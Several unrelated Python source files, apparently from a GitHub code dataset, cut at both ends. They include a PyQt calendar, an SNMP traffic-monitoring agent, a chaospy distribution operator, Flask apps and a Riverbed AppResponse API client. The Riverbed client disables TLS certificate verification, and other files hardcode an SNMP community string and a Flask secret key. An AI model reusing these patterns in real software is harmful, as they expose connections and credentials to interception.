self.i_log.append(i)\n","repo_name":"alunfes/btc-bot2","sub_path":"Account2.py","file_name":"Account2.py","file_ext":"py","file_size_in_byte":7792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9340837855","text":"import sys\n\nfrom PyQt5.QtWidgets import *\n\n\nclass Window(QWidget):\n def __init__(self):\n super(Window, self).__init__()\n self.setWindowTitle(\"Calender\")\n self.setGeometry(50, 50, 500, 300)\n layout = QGridLayout()\n self.setLayout(layout)\n self.calender = QCalendarWidget()\n self.calender.setGridVisible(True)\n self.calender.setNavigationBarVisible(True)\n self.calender.selectionChanged.connect(self.handle_selection)\n layout.addWidget(self.calender, 0, 0)\n\n def handle_selection(self):\n selected = self.calender.selectedDate()\n print(selected.toString(\"yyyy-MM-dd\"))\n\n\napp = QApplication(sys.argv)\n\n\ndef main():\n window = Window()\n window.show()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"shoukreytom/Python","sub_path":"gui/pyqt/Calender.py","file_name":"Calender.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1794126326","text":"# from GetSNMP import *\nfrom pysnmp.hlapi import *\nimport rrdtool\nfrom time import *\nimport json\nimport os\nimport threading\nfrom reportlab.pdfgen import canvas\n\n\nclass Agente:\n\n def __init__(self,comunidad:str,host:str):\n self.Comunidad=comunidad\n self.Host=host\n self.Nombre_sistema=None\n # Version y logo del sistema operativo (lo ponemos nosotros)\n # Ubicacion geografica \n self.Num_interfaces=None\n self.Tiempo_Activo=None\n self.Lista_Consultas=[0,0,0,0,0]\n # Creando carpeta para almacenar las bases de datos generadas\n\n try:\n os.mkdir(self.Host)\n except:\n pass\n\n def status(self)->bool:\n try:\n self.Nombre_sistema=self.consultaSNMP(\"1.3.6.1.2.1.1.1.0\")\n # Version y logo del sistema operativo (lo ponemos nosotros)\n # Ubicacion geografica \n self.Num_interfaces=self.consultaSNMP(\"1.3.6.1.2.1.2.1.0\") \n self.Tiempo_Activo=self.consultaSNMP(\"1.3.6.1.2.1.1.3.0\") \n print(\"|==============================|\\nComunidad:\",self.Comunidad)\n print(\"Host:\",self.Host)\n print(\"Nombre del sistema:\",self.Nombre_sistema)\n print(\"Numero de interfaces de red:\",self.Num_interfaces)\n print(\"Tiempo desde el ultimo reinicio:\",self.Tiempo_Activo,\"Segs\")\n return True\n except :\n print(\"Error en status\")\n return False\n \n\n def analisis(self):\n self.creaBases() #creo mis bases\n inicio=time()\n fin= inicio + 690# 16 minutos\n while True:\n print(self.updateListaConsultas())\n inicio=time()\n if not inicio < fin:\n break\n self.creaGraficas()\n\n def creaBases(self):\n self.nuevaRDD(\"multicast.rrd\")\n self.nuevaRDD(\"ipv4.rrd\")\n self.nuevaRDD(\"icmp.rrd\")\n self.nuevaRDD(\"octets.rrd\")\n self.nuevaRDD(\"ports.rrd\")\n\n #ciclo update\n def creaGraficas(self):\n self.nuevaGrafica(\"multicast.png\",'multicast.rrd')\n self.nuevaGrafica(\"ipv4.png\",'ipv4.rrd')\n self.nuevaGrafica(\"icmp.png\",'icmp.rrd')\n self.nuevaGrafica(\"octets.png\",'octets.rrd')\n self.nuevaGrafica(\"ports.png\",'ports.rrd')\n\n def updateListaConsultas(self)->list:\n #str_mib=\"1.3.6.1.2.1.\"\n \n # print(\"2) Paquetes multicast que ha recibido una interfaz (ifInNUcastPkts) 1.3.6.1.2.1.2.2.1.12.1 counter\")\n self.Lista_Consultas[0] = self.consultaSNMP(\"1.3.6.1.2.1.2.2.1.12.1\")\n rrdtool.update(self.Host+'/multicast.rrd', \"N:\" + self.Lista_Consultas[0])\n rrdtool.dump(self.Host+'/multicast.rrd',self.Host+'/multicast.xml')\n\n # print(\"2) Paquetes recibidos exitosamente, entregados a protocolos IPv4. (ipInDelivers) 1.3.6.1.2.1.4.9.0 counter\")\n self.Lista_Consultas[1] = self.consultaSNMP(\"1.3.6.1.2.1.4.9.0\")\n rrdtool.update(self.Host+'/ipv4.rrd', \"N:\" + self.Lista_Consultas[1])\n rrdtool.dump(self.Host+'/ipv4.rrd',self.Host+'/ipv4.xml')\n\n # print(\"2) Mensajes de respuesta ICMP que ha enviado el agente (icmpOutEchoReps) 1.3.6.1.2.1.5.22.0 counter\")\n self.Lista_Consultas[2] = self.consultaSNMP(\"1.3.6.1.2.1.5.22.0\")\n rrdtool.update(self.Host+'/icmp.rrd', \"N:\" + self.Lista_Consultas[2])\n rrdtool.dump(self.Host+'/icmp.rrd',self.Host+'/icmp.xml')\n\n # print(\"2) Segmentos enviados, incluyendo los de las conexiones actuales, \",\n # \"pero excluyendo los que contienen solamente octetos retransmitidos (ifOutOctets) 1.3.6.1.2.1.2.2.1.16.1 counter\")\n self.Lista_Consultas[3] = self.consultaSNMP(\"1.3.6.1.2.1.2.2.1.16.1\")\n rrdtool.update(self.Host+'/octets.rrd', \"N:\" + self.Lista_Consultas[3])\n rrdtool.dump(self.Host+'/octets.rrd',self.Host+'/octets.xml')\n\n # print(\"D2) Datagramas recibidos que no pudieron ser entregados por cuestiones \",\n # \"distintas a la falta de aplicación en el puerto destino (udpNoPorts) 1.3.6.1.2.1.7.2.0 counter\")\n self.Lista_Consultas[4] = self.consultaSNMP(\"1.3.6.1.2.1.7.2.0\")\n rrdtool.update(self.Host+'/ports.rrd', \"N:\" + self.Lista_Consultas[4])\n rrdtool.dump(self.Host+'/ports.rrd',self.Host+'/ports.xml')\n\n return self.Lista_Consultas\n\n def consultaSNMP(self,oid:str):\n errorIndication, errorStatus, errorIndex, varBinds = next(\n # hace la solicitud getsnmp\n getCmd(SnmpEngine(),\n CommunityData(self.Comunidad),\n UdpTransportTarget((self.Host, 161)), # udp\n ContextData(),\n ObjectType(ObjectIdentity(oid)))) \n\n # tratamiento de errores\n if errorIndication:\n print(errorIndication)\n elif errorStatus:\n print('%s at %s' % (errorStatus.prettyPrint(),errorIndex and varBinds[int(errorIndex) - 1][0] or '?'))\n else:\n for varBind in varBinds:\n varB=(' = '.join([x.prettyPrint() for x in varBind]))\n # print(varB)\n resultado= varB.split()[2] # se agarra la ultima parte de la consulta\n return resultado\n\n def nuevaRDD(self,nombreRRD:str):\n # creamos la bae de datos\n ret = rrdtool.create(self.Host+\"/\"+nombreRRD,\n \"--start\", # momento que se empieza a almacenar los datos\n 'N',# now (empieza al momento de ejecutar el script) (tambien un numero)\n \"--step\", # un step\n '30', # cada minuto\n #DS: Octetos de entrada : Tipo contador : cada dos minutos : sin limites minumos : sin limites maximos\n \"DS:octets:COUNTER:30:U:U\",\n #RRA: Cada 60 segs de hace un AVERAGE: la mitad de muestras se validan: cada 1 step : numero de filas en la base de datos\n \"RRA:AVERAGE:0.5:1:32\") #32 filas,cada uno de 30 segs\n\n #en caso de haber un error lo sabremos\n if ret:\n print (rrdtool.error())\n\n def nuevaGrafica(self,nombre_grafica:str,base_RRD:str):\n # tiempo actual\n tiempo_actual = int(time())\n #Grafica desde el tiempo actual menos diez minutos\n tiempo_inicial = tiempo_actual - 690 #16 minutos lo que dura el analisis\n # solo se generara una grafica en base al tradico de red\n ret = rrdtool.graph( self.Host+\"/\"+nombre_grafica,\n \"--start\",str(tiempo_inicial),\n \"--end\",\"N\",\n \"--vertical-label=Bytes/s\", # maquillaje para la grafica\n \"--title=\"+nombre_grafica, # maquillaje para la grafica\n # se consulta la informacion para graficarlo\n \"DEF:trafico=\"+self.Host+\"/\"+base_RRD+\":octets:AVERAGE\",\n # recorre toda la coleccion para convertir los octetos a bites\n \"CDEF:escalaIn=trafico,8,*\",\n # Para imprimir los datos\n \"LINE3:escalaIn#00FF00:Trafico de entrada\")\n\n def __eq__(self, agente):\n return self.Host==agente.Host\n\n def reporte(self):\n c=canvas.Canvas(self.Host+\"/\"+self.Host+\"_report.pdf\")\n \n c.drawString(170, 780, \"Reporte de trafico hecho por Cruz villalba Edwin Benrardo\")\n\n datos_principales= (\"Comunidad:\"+self.Comunidad+\"\\n\",\n \"Host:\"+self.Host+\"\\n\",\n \"Nombre del sistema:\"+self.Nombre_sistema+\"\\n\",\n \"Numero de interfaces:\"+self.Num_interfaces+\"\\n\",\n \"Tiempo activo:\"+self.Tiempo_Activo)\n texto=c.beginText(70,760)\n texto.textLines(datos_principales)\n c.drawImage(self.Host+\"/icmp.png\", 30, 550, width=250, height=100)\n c.drawImage(self.Host+\"/ipv4.png\", 30, 450, width=250, height=100)\n c.drawImage(self.Host+\"/multicast.png\", 290, 550, width=250, height=100)\n c.drawImage(self.Host+\"/octets.png\", 290, 450, width=250, height=100)\n c.drawImage(self.Host+\"/ports.png\", 150,350, width=250, height=100)\n c.drawText(texto)\n c.save()\n\n\n # def __del__(self):\n # os.rmdir(self.Host)\n\nclass Agentes:\n def __init__(self,comunidad:str):\n self.temp_list=[]\n self.agentes=[]\n self.Comunidad=comunidad\n with open(\"agentes.json\",'r') as temp_file:\n self.temp_list=json.load(temp_file)\n print(\"Agentes actuales\",self.temp_list)\n for host in self.temp_list:\n self.agentes.append(Agente(self.Comunidad,host))\n\n\n def agregar(self,host:str):\n nuevo=Agente(self.Comunidad,host)\n if nuevo.status():\n self.temp_list.append(host)\n self.agentes.append(nuevo)\n self.actualizar()\n return True\n else:\n del nuevo\n return False\n\n def eliminar(self,host:str):\n nuevo=Agente(self.Comunidad,host)\n if nuevo.status():\n self.temp_list.remove(host)\n self.agentes.remove(nuevo)\n self.actualizar()\n return True\n else:\n return False\n\n def actualizar(self):\n with open(\"agentes.json\",'w') as temp_file:\n json.dump(self.temp_list,temp_file)\n \n def trafico(self):\n pass\n list_hilos=[]\n for index,agente in zip(range(0,len(self.agentes)),self.agentes):\n #for agente in self.agentes:\n list_hilos.append(threading.Thread(target=agente.analisis))\n list_hilos[index].start()\n\n def reportes(self):\n for agente in self.agentes:\n agente.reporte()\n \n \n def status(self):\n for agente in self.agentes:\n agente.status()\n\n\nif __name__=='__main__':\n\n comunidad=\"123\"\n agentes=Agentes(comunidad)\n \n opcion=0\n while True:\n os.system(\"clear\")\n print(agentes.temp_list)\n agentes.status()\n print(\"|==============================|\")\n print(\"Menu:\\n1)Alta.\\n2)Baja.\\n3)Trafico.\\n4)Generar reporte\\n5)Salir\\n\")\n opcion=int(input(\"Escriba la opcion: \"))\n if opcion==1:\n nuevo_host=input(\"Escriba un host valido: \")\n if agentes.agregar(nuevo_host):\n print(\"Agregado.\")\n else:\n print(\"No se encontro el agente.\")\n sleep(3)\n elif opcion==2:\n fuera_host=input(\"Escriba el host a eliminar: \")\n if agentes.eliminar(fuera_host):\n print(\"Eliminado\")\n else:\n print(\"No se encontro el agente a eliminar.\") \n sleep(3)\n elif opcion==3:\n print(\"Espere 16 min para que se llene la base de datos...\")\n agentes.trafico()\n sleep(2)\n elif opcion==4:\n print(\"Generando reportes... Espere\")\n agentes.reportes()\n sleep(2)\n elif opcion==5:\n break\n else:\n continue\n \n","repo_name":"edwbcruzv/Admin_de_Redes","sub_path":"Practica1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11043,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24539216736","text":"from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar, Union\n\nimport attr\n\nfrom ..types import UNSET, Unset\n\nif TYPE_CHECKING:\n from ..models.annotated_doc_category import AnnotatedDocCategory\n from ..models.annotated_doc_sentence_metadata import AnnotatedDocSentenceMetadata\n\n\nT = TypeVar(\"T\", bound=\"AnnotatedDocSentence\")\n\n\n@attr.s(auto_attribs=True)\nclass AnnotatedDocSentence:\n \"\"\"\n Attributes:\n end (int):\n start (int):\n categories (Union[Unset, List['AnnotatedDocCategory']]):\n metadata (Union[Unset, AnnotatedDocSentenceMetadata]):\n \"\"\"\n\n end: int\n start: int\n categories: Union[Unset, List[\"AnnotatedDocCategory\"]] = UNSET\n metadata: Union[Unset, \"AnnotatedDocSentenceMetadata\"] = UNSET\n\n def to_dict(self) -> Dict[str, Any]:\n end = self.end\n start = self.start\n categories: Union[Unset, List[Dict[str, Any]]] = UNSET\n if not isinstance(self.categories, Unset):\n categories = []\n for categories_item_data in self.categories:\n categories_item = categories_item_data.to_dict()\n\n categories.append(categories_item)\n\n metadata: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.metadata, Unset):\n metadata = self.metadata.to_dict()\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(\n {\n \"end\": end,\n \"start\": start,\n }\n )\n if categories is not UNSET:\n field_dict[\"categories\"] = categories\n if metadata is not UNSET:\n field_dict[\"metadata\"] = metadata\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n from ..models.annotated_doc_category import AnnotatedDocCategory\n from ..models.annotated_doc_sentence_metadata import AnnotatedDocSentenceMetadata\n\n d = src_dict.copy()\n end = d.pop(\"end\")\n\n start = d.pop(\"start\")\n\n categories = []\n _categories = d.pop(\"categories\", UNSET)\n for categories_item_data in _categories or []:\n categories_item = AnnotatedDocCategory.from_dict(categories_item_data)\n\n categories.append(categories_item)\n\n _metadata = d.pop(\"metadata\", UNSET)\n metadata: Union[Unset, AnnotatedDocSentenceMetadata]\n if isinstance(_metadata, Unset):\n metadata = UNSET\n else:\n metadata = AnnotatedDocSentenceMetadata.from_dict(_metadata)\n\n annotated_doc_sentence = cls(\n end=end,\n start=start,\n categories=categories,\n metadata=metadata,\n )\n\n return annotated_doc_sentence\n","repo_name":"kairntech/sherpa-client","sub_path":"sherpa_client/models/annotated_doc_sentence.py","file_name":"annotated_doc_sentence.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22937114669","text":"\"\"\"Power operator.\"\"\"\nimport numpy\nimport chaospy\n\nfrom ..baseclass import Distribution, OperatorDistribution\n\n\nclass Power(OperatorDistribution):\n \"\"\"Power operator.\"\"\"\n\n _operator = lambda self, left, right: left**right\n\n def __init__(self, left, right):\n \"\"\"\n Constructor.\n\n Args:\n left (Distribution, numpy.ndarray) : Left hand side.\n right (Distribution, numpy.ndarray) : Right hand side.\n \"\"\"\n super(Power, self).__init__(\n left=left,\n right=right,\n repr_args=[left, right],\n )\n\n def _lower(self, idx, left, right, cache):\n \"\"\"\n Distribution lower bounds.\n\n Example:\n >>> chaospy.Uniform().lower\n array([0.])\n >>> chaospy.Power(chaospy.Uniform(), 2).lower\n array([0.])\n >>> chaospy.Power(chaospy.Uniform(1, 2), -1).lower\n array([0.5])\n >>> chaospy.Power(2, chaospy.Uniform()).lower\n array([1.])\n >>> chaospy.Power(2, chaospy.Uniform(-1, 0)).lower\n array([0.5])\n\n \"\"\"\n left = self._parameters[\"left\"]\n right = self._parameters[\"right\"]\n\n if isinstance(left, Distribution):\n left_upper = left._get_upper(idx, cache=self._upper_cache)\n left_lower = left._get_lower(idx, cache=self._lower_cache)\n\n if isinstance(right, Distribution):\n right_upper = right._get_upper(idx, cache=self._upper_cache)\n right_lower = right._get_lower(idx, cache=self._lower_cache)\n\n out = numpy.min(\n numpy.broadcast_arrays(\n left_lower.T**right_lower.T,\n left_lower.T**right_upper.T,\n left_upper.T**right_lower.T,\n left_upper.T**right_upper.T,\n ),\n axis=0,\n ).T\n\n else:\n # assert 0, (idx, left_lower, left_upper, right)\n out = numpy.min(\n [left_lower ** right[idx], left_upper ** right[idx]], axis=0\n ).T\n\n else:\n assert isinstance(right, Distribution)\n right_upper = right._get_upper(idx, cache=self._upper_cache)\n right_lower = right._get_lower(idx, cache=self._lower_cache)\n out = numpy.min(\n [left[idx] ** right_lower, left[idx] ** right_upper], axis=0\n ).T\n\n return out\n\n def _upper(self, idx, left, right, cache):\n \"\"\"\n Distribution bounds.\n\n Example:\n >>> chaospy.Uniform().upper\n array([1.])\n >>> chaospy.Power(chaospy.Uniform(), 2).upper\n array([1.])\n >>> chaospy.Power(chaospy.Uniform(1, 2), -1).upper\n array([1.])\n >>> chaospy.Power(2, chaospy.Uniform()).upper\n array([2.])\n >>> chaospy.Power(2, chaospy.Uniform(-1, 0)).upper\n array([1.])\n\n \"\"\"\n left = self._parameters[\"left\"]\n right = self._parameters[\"right\"]\n if isinstance(left, Distribution):\n left_lower = left._get_lower(idx, cache=self._lower_cache)\n left_upper = left._get_upper(idx, cache=self._upper_cache)\n\n if isinstance(right, Distribution):\n right_lower = right._get_lower(idx, cache=self._lower_cache)\n right_upper = right._get_upper(idx, cache=self._upper_cache)\n\n out = numpy.max(\n numpy.broadcast_arrays(\n (left_lower.T**right_lower.T).T,\n (left_lower.T**right_upper.T).T,\n (left_upper.T**right_lower.T).T,\n (left_upper.T**right_upper.T).T,\n ),\n axis=0,\n )\n\n else:\n out = numpy.max(\n [left_lower ** right[idx], left_upper ** right[idx]], axis=0\n )\n\n else:\n assert isinstance(right, Distribution)\n right_lower = right._get_lower(idx, cache=self._lower_cache)\n right_upper = right._get_upper(idx, cache=self._upper_cache)\n out = numpy.max(\n [left[idx] ** right_lower, left[idx] ** right_upper], axis=0\n )\n\n return out\n\n def _pdf(self, xloc, idx, left, right, cache):\n \"\"\"\n Probability density function.\n\n Example:\n >>> chaospy.Uniform().pdf([-0.5, 0.5, 1.5, 2.5])\n array([0., 1., 0., 0.])\n >>> chaospy.Power(chaospy.Uniform(), 2).pdf([-0.5, 0.5, 1.5, 2.5])\n array([0. , 0.70710678, 0. , 0. ])\n >>> chaospy.Power(chaospy.Uniform(1, 2), -1).pdf([0.4, 0.6, 0.8, 1.2])\n array([0. , 2.77777778, 1.5625 , 0. ])\n >>> chaospy.Power(2, chaospy.Uniform()).pdf([-0.5, 0.5, 1.5, 2.5])\n array([0. , 0. , 0.96179669, 0. ])\n >>> chaospy.Power(2, chaospy.Uniform(-1, 0)).pdf([0.4, 0.6, 0.8, 1.2])\n array([0. , 2.40449173, 1.8033688 , 0. ])\n\n \"\"\"\n if isinstance(left, Distribution):\n x_ = numpy.sign(xloc) * numpy.abs(xloc) ** (1.0 / right - 1)\n xloc = numpy.sign(xloc) * numpy.abs(xloc) ** (1.0 / right)\n pairs = numpy.sign(xloc**right) == 1\n out = left._get_pdf(xloc, idx, cache=cache.copy())\n if numpy.any(pairs):\n out = out + pairs * left._get_pdf(-xloc, idx, cache=cache)\n out = numpy.sign(right) * out * x_ / right\n out[numpy.isnan(out)] = numpy.inf\n\n else:\n assert numpy.all(left > 0), \"imaginary result\"\n x_ = numpy.where(\n xloc <= 0,\n -numpy.inf,\n numpy.log(xloc + 1.0 * (xloc <= 0))\n / numpy.log(left + 1.0 * (left == 1)),\n )\n num_ = numpy.log(left + 1.0 * (left == 1)) * xloc\n num_ = num_ + 1.0 * (num_ == 0)\n out = right._get_pdf(x_, idx, cache=cache) / num_\n\n return out\n\n def _cdf(self, xloc, idx, left, right, cache):\n \"\"\"\n Cumulative distribution function.\n\n Example:\n >>> chaospy.Uniform().fwd([-0.5, 0.5, 1.5, 2.5])\n array([0. , 0.5, 1. , 1. ])\n >>> chaospy.Power(chaospy.Uniform(), 2).fwd([-0.5, 0.5, 1.5, 2.5])\n array([0. , 0.70710678, 1. , 1. ])\n >>> chaospy.Power(chaospy.Uniform(1, 2), -1).fwd([0.4, 0.6, 0.8, 1.2])\n array([0. , 0.33333333, 0.75 , 1. ])\n >>> chaospy.Power(2, chaospy.Uniform()).fwd([-0.5, 0.5, 1.5, 2.5])\n array([0. , 0. , 0.5849625, 1. ])\n >>> chaospy.Power(2, chaospy.Uniform(-1, 0)).fwd([0.4, 0.6, 0.8, 1.2])\n array([0. , 0.26303441, 0.67807191, 1. ])\n\n \"\"\"\n if isinstance(left, Distribution):\n y = numpy.sign(xloc) * numpy.abs(xloc) ** (1.0 / right)\n pairs = numpy.sign(xloc**right) != -1\n out2 = left._get_fwd(-y, idx, cache=cache.copy())\n out1 = left._get_fwd(y, idx, cache=cache)\n out = numpy.where(right < 0, 1 - out1, out1 - pairs * out2)\n else:\n y = numpy.log(numpy.abs(xloc) + 1.0 * (xloc <= 0)) / numpy.log(\n numpy.abs(left) + 1.0 * (left == 1)\n )\n out = right._get_fwd(y, idx, cache=cache)\n out = numpy.where(xloc <= 0, 0.0, out)\n return out\n\n def _ppf(self, q, idx, left, right, cache):\n \"\"\"\n Point percentile function.\n\n Example:\n >>> chaospy.Uniform().inv([0.1, 0.2, 0.9])\n array([0.1, 0.2, 0.9])\n >>> chaospy.Power(chaospy.Uniform(), 2).inv([0.1, 0.2, 0.9])\n array([0.01, 0.04, 0.81])\n >>> chaospy.Power(chaospy.Uniform(1, 2), -1).inv([0.1, 0.2, 0.9])\n array([0.52631579, 0.55555556, 0.90909091])\n >>> chaospy.Power(2, chaospy.Uniform()).inv([0.1, 0.2, 0.9])\n array([1.07177346, 1.14869835, 1.86606598])\n >>> chaospy.Power(2, chaospy.Uniform(-1, 0)).inv([0.1, 0.2, 0.9])\n array([0.53588673, 0.57434918, 0.93303299])\n\n \"\"\"\n if isinstance(left, Distribution):\n q = numpy.where(right.T < 0, 1 - q.T, q.T).T\n out = (left._get_inv(q, idx, cache=cache).T ** right.T).T\n else:\n out = right._get_inv(q, idx, cache=cache)\n out = numpy.where(left < 0, 1 - out, out)\n out = (left.T**out.T).T\n return out\n\n def _mom(self, k, left, right, cache):\n \"\"\"\n Statistical moments.\n\n Example:\n >>> numpy.around(chaospy.Uniform().mom([0, 1, 2, 3]), 4)\n array([1. , 0.5 , 0.3333, 0.25 ])\n >>> numpy.around(chaospy.Power(chaospy.Uniform(), 2).mom([0, 1, 2, 3]), 4)\n array([1. , 0.3333, 0.2 , 0.1429])\n >>> numpy.around(chaospy.Power(chaospy.Uniform(1, 2), -1).mom([0, 1, 2, 3]), 4)\n array([1. , 0.6931, 0.5 , 0.375 ])\n >>> numpy.around(chaospy.Power(2, chaospy.Uniform()).mom([0, 1, 2, 3]), 4)\n array([1. , 1.4427, 2.164 , 3.3663])\n >>> numpy.around(chaospy.Power(2, chaospy.Uniform(-1, 0)).mom([0, 1, 2, 3]), 4)\n array([1. , 0.7213, 0.541 , 0.4208])\n\n \"\"\"\n del cache\n if isinstance(right, Distribution):\n raise chaospy.UnsupportedFeature(\"distribution as exponent not supported.\")\n if numpy.any(right < 0):\n raise chaospy.UnsupportedFeature(\n \"distribution to negative power not supported.\"\n )\n if not numpy.allclose(right, numpy.array(right, dtype=int)):\n raise chaospy.UnsupportedFeature(\n \"distribution to fractional power not supported.\"\n )\n return left._get_mom(k * right)\n","repo_name":"jonathf/chaospy","sub_path":"chaospy/distributions/operators/power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":10072,"program_lang":"python","lang":"en","doc_type":"code","stars":417,"dataset":"github-code","pt":"47"} +{"seq_id":"26609925089","text":"import datetime\n\nfrom google.appengine.api import users\n\nfrom nomic.db import User\n\nrefresh_delta = datetime.timedelta(hours=1)\n\ndef _user(self):\n is_admin = users.is_current_user_admin()\n guser = users.get_current_user()\n if guser:\n user = User.get_by_key_name(guser.user_id())\n if user is None:\n user = User(key_name=guser.user_id())\n user.user = guser\n user.last_login = datetime.datetime.now()\n user.put()\n if datetime.datetime.now() - user.last_login >= refresh_delta:\n user.last_login = datetime.datetime.now()\n user.put()\n url = users.create_logout_url(self.request.uri)\n else:\n user = None\n url = users.create_login_url(self.request.uri)\n return user, is_admin, url\n\ndef send_error(handler, msg, *args, **kwargs):\n handler.response.set_status(kwargs.get('status', 500))\n msg = msg % args\n handler.response.out.write(handler.env.get_template('error.html').render(locals()))\n","repo_name":"coderanger/pynomic","sub_path":"nomic/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"47"} +{"seq_id":"70360365262","text":"from flask import Flask, flash, redirect, render_template, request\napp = Flask(__name__)\napp.secret_key = 'keep it secret, keep it safe'\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route('/result', methods=[\"POST\"])\ndef result():\n if len(request.form['comment']) > 120:\n flash(\"Comment cannot be more than 120 characters.\")\n if not request.form['name']:\n flash(\"Name is required!\")\n return redirect(\"/\")\n else:\n name = request.form['name']\n location = request.form['location']\n language = request.form['language']\n comment = request.form['comment']\n return render_template('result.html', name=name, location=location, language=language, comment=comment)\n\n\napp.run(debug = True)","repo_name":"Colbyjoe97/CodingDojo","sub_path":"Python(2021)/Flask/Dojo_Survey_With_Validation/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32017516415","text":"import os\r\nimport json\r\nfrom time import time\r\nfrom collections import defaultdict\r\nfrom itertools import product\r\n\r\n\r\ntry:\r\n f = open('rate_dict.json', 'r')\r\n rate_dict = json.load(f)\r\n f.close()\r\nexcept FileNotFoundError:\r\n nested_dict = lambda: defaultdict(nested_dict)\r\n rate_dict = nested_dict()\r\n\r\nfile_size = 12.8 # Kb\r\nsender_timeout_vals = range(3, 10 + 1)\r\nwindow_size_vals = range(1, 10 + 1)\r\nreceiver_timeout = 4\r\n\r\n\r\nfor sender_timeout, window_size in product(sender_timeout_vals, window_size_vals):\r\n # run sender with params\r\n start_time = time()\r\n os.system(f\"python sender_gbn.py {window_size} {sender_timeout}\")\r\n end_time = time()\r\n data_rate = round(file_size/(end_time-start_time), 10)\r\n print(f\"Window Size: {window_size}, Sender Timeout: {sender_timeout}, Receiver Timeout: {receiver_timeout} ----> Data Rate: {data_rate} Kbps\")\r\n rate_dict[window_size][sender_timeout][receiver_timeout] = data_rate\r\n\r\nwith open('rate_dict.json', 'w') as f:\r\n json.dump(rate_dict, f)","repo_name":"gadm21/DORA","sub_path":"services/lora_test_service/sender_loop.py","file_name":"sender_loop.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2282573750","text":"import requests\nimport json\nimport time\nimport string\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import request\nfrom calendar import timegm\nfrom datetime import datetime\n# Lines containing critical informations : 17 18 19 + very last line (port)\n#########################################################################################################################\n## ##\n## Initializing server ##\n## ##\n#########################################################################################################################\n# Riverbed AppResponse probe's address and credentials\nHOST = \"\"\nUSERNAME = \"\"\nPASSWORD = \"\"\nuserCredentials = {\n \"user_credentials\":\n {\n \"username\":USERNAME, \"password\":PASSWORD\n },\n \"generate_refresh_token\": False\n}\n# Creating instance of Flask (e.g app)\nserverFlask = Flask(__name__)\n# Session is used for SSL overriding\nsession = requests.Session()\n# Variables for buffering all lists returned to Grafana (refreshed if 120s elapsed) exepting FamilyPageList\nlastTimeHostGroupListHasBeenPicked = 0\nhostGroupsList = []\nlastTimeApplicationsListHasBeenPicked = 0\napplicationsList = []\nlastTimeWebAppsListHasBeenPicked = 0\nwebAppsList = []\nlastTimemetricsHostGroupListHasBeenPicked = 0\nmetricsHostGroupList = []\nlastTimeMetricsApplicationListHasBeenPicked = 0\nmetricsApplicationList = []\nlastTimeMetricsWebAppListHasBeenPicked = 0\nmetricsWebAppList = []\n# Variable for Pagefamilies query\nglobalAllRowSourceIDs = [0]*26\n\n\n#########################################################################################################################\n## ##\n## FUNCTIONS DECLARATION ##\n## ##\n#########################################################################################################################\n# Authentication function\n# Argument credentials = object with credentials\ndef tryAuthentication(credentials):\n # Converting credentials to JSON format\n dataLogsJSON = json.dumps(credentials)\n # URL to connect API's authentication system\n urlLogin = 'https://'+HOST+'/api/mgmt.aaa/1.0/token'\n # Sending request for authentication (without SSL certificate check)\n r = session.post(urlLogin, dataLogsJSON, verify=False)\n return r\n\n\n# Refresh token function\n# Argument credentials = object with credentials\ndef getNewToken(credentials):\n reponse = tryAuthentication(credentials)\n dictionnaire = reponse.json()\n # On extrait le token\n token = dictionnaire['access_token']\n return token\n\n\n# POST request function (creation of instances e.g reports)\n# Argument credentials = object with credentials\n# Argument dataDefJSON = data definitions in JSON format (=metric query)\ndef createSyncInstance(credentials, dataDefJSON):\n global currentToken\n # URL to connect API's report creation system\n urlPOSTsync = 'https://'+HOST+'/api/npm.reports/1.0/instances/sync'\n # Adding token to headers for Riverbed access\n headers = {\"Authorization\": \"Bearer \"+ currentToken}\n response = session.post(urlPOSTsync, dataDefJSON, headers=headers, verify=False)\n # If token is expired get a brand new token\n if response.status_code == 401:\n currentToken = getNewToken(credentials)\n headers = {\"Authorization\": \"Bearer \"+ currentToken}\n response = session.post(urlPOSTsync, dataDefJSON, headers=headers, verify=False)\n return response\n\n\n# GET request function (collect informations through API : hostgroups, applications, webapps...)\n# Argument credentials = object with credentials\n# Argument url = API's url\ndef retrieveInformationFromAPI(credentials, url):\n global currentToken\n # Adding token to headers for Riverbed access\n headers = {\"Authorization\": \"Bearer \"+ currentToken}\n # Querying Riverbed AppResponse\n response = session.get(url, headers=headers, verify=False)\n # If token is expired get a brand new token\n if response.status_code == 401:\n currentToken = getNewToken(credentials)\n headers = {\"Authorization\": \"Bearer \"+ currentToken}\n response = session.get(url, headers=headers, verify=False)\n # Returning server's response, containing all data returned by API\n return response\n\n\n# Time converting to epoch time format (seconds elapsed from 1970)\ndef convert_to_epoch(timestamp):\n return timegm(datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%S.%fZ').timetuple())\n\n\n# Get the very first token (server initilization)\ncurrentToken = getNewToken(userCredentials)\n\n#########################################################################################################################\n## ##\n## HEALTH TEST ##\n## ##\n#########################################################################################################################\n# Response when adding new datasource in Grafana, must return a 200 http_code to be accepted\n@serverFlask.route(\"/\", methods = ['GET'])\ndef healthTest():\n return 